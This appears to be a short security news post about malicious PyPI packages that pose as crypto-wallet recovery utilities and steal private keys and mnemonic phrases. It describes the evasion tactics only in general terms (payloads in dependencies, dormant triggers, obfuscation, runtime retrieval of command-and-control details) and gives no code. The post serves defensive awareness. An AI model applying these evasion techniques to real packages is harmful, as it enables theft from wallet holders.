PyPI has long been used as a means of distributing malicious code masquerading as legitimate utilities by bad actors. Yehuda Gelb recently exposed one such operation, targeting users of prominent crypto-wallets such as Atomic, Metamask, Exodus, and many more, by uploading multiple packages within a short timeframe to the repository, presenting them as utilities for the recovery and management of crypto-wallets.
The packages appeared to offer valuable functionality for users engaged in the recovery or management of crypto-wallets. They were instead designed to covertly steal wallet data including private keys and mnemonic phrases with access to which, attackers can swiftly drain cryptocurrency wallets and even worse, monitor the wallets and exploit them over time without the users’ knowledge.
In order to disguise the malicious intent of the packages and avoid detection, the packages themselves did not carry any malicious code, choosing instead to distribute it in a series of underlying dependencies and fetching it once certain conditions were met. This strategic use of dependencies created an effective smokescreen, allowing the packages themselves to appear harmless.
Another method used to prevent detection of the packages is that unlike most delivered via this method, these packages do not activate automatically, but instead remain dormant until certain functions are triggered. Most methods of detecting malicious entities in a system rely on monitoring the activity of applications and identifying anomalies. Since the package doesn’t actually do anything until the triggering of the function, it can fly under the radar undetected during installation.
Even at the heart of the packages’ underlying dependencies where the malicious code lies, the code is heavily obfuscated. This obfuscation makes it challenging for automated security tools and human reviewers alike to quickly identify the package’s true intent.
Another practice employed by the attacker was the dynamic retrieval of any sort of information that the program required to function. This makes it so that the code contains no information hardcoded into it that could lead back to the attacker or their command and control servers. It also makes static code analysis difficult and affords the attacker flexibility in case they have to change their infrastructure without requiring changes to the packages themselves.
This advanced attack leveraging the Python ecosystem highlights the critical need for staying informed and going beyond basic due diligence. While due diligence alone may not catch such sophisticated threats, a knowledgeable individual would recognize such risks and take proactive steps to mitigate them. Stay ahead of the ever-evolving open-source threats with Decrypting.